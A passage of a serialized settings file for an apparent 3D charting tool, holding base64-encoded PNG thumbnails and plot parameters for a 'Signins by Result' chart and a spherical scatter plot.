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', 'Title': 'Signins by Result', 'TitleSize': 1, 'TransitionIndex': 0}, {'$type': 'HoloGraphBridge.Plots.SphericalScatterPlot, HoloGraphBridge', 'AxesDivisions': [4, 4, 0], 'AxesDivisionsAuto': [True, True, True], 'AxesEdgesShow': [False, False, True], 'AxesGridlinesShow': [False, False, True], 'AxesLabelsOrientation': [0, 1, 0], 'AxesLabelsShow': [True, True, True], 'AxesLabelsSize': [0.5, 0.5, 0.5], 'AxesMax': [180, 90, 0], 'AxesMaxAuto': [True, True, True], 'AxesMin': [-180, -90, 0], 'AxesMinAuto': [True, True, True], 'AxesTicksShow': [False, False, True], 'AxesTitleSize': [0.5, 0.5, 0.5], 'PositionFill': [False, False, False], 'PositionIndex': [44, 43, -1], 'PositionRescale': [False, False, False], 'PositionReverse': [False, False, False], 'PositionScale': [1, 1, 1], 'UniformSizeFill': False, 'UniformSizeIndex': -1, 'UniformSizeRescale': True, 'UniformSizeReverse': False, 'UniformSizeScale': 1, 'CameraRotation': [0, 0, 0, 1], 'CameraTranslation': [0, 0, 0], 'ColorFill': False, 'ColorIndex': 42, 'Filter': -1, 'LabelColumns': [{'Index': 26, 'Name': False, 'Units': False}, {'Index': 37, 'Name': False, 'Units': False}], 'Layers': [], 'ManipulationRotation': [True, True, True], 'ManipulationScale': True, 'ManipulationTranslation': [True, True, True], 'ModelRotation': [0.4857748746871948, -0.002845821902155876, -0.004010239616036415, 0.8740501999855042], 'ModelScale': 4, 'ModelTranslation': [0, 0, 0], 'OrderIndex': 0, 'PaletteColors': [242, 27, 63, 255, 41, 191, 18, 255], 'PaletteDivisions': 2, 'PaletteDivisionsAuto': True, 'PaletteReverse': False, 'Selection': -1, 'Table': 0, 'TextSize': 0.5, 'TextWidth': 5, 'Thumbnail': 'data:image/png;base64,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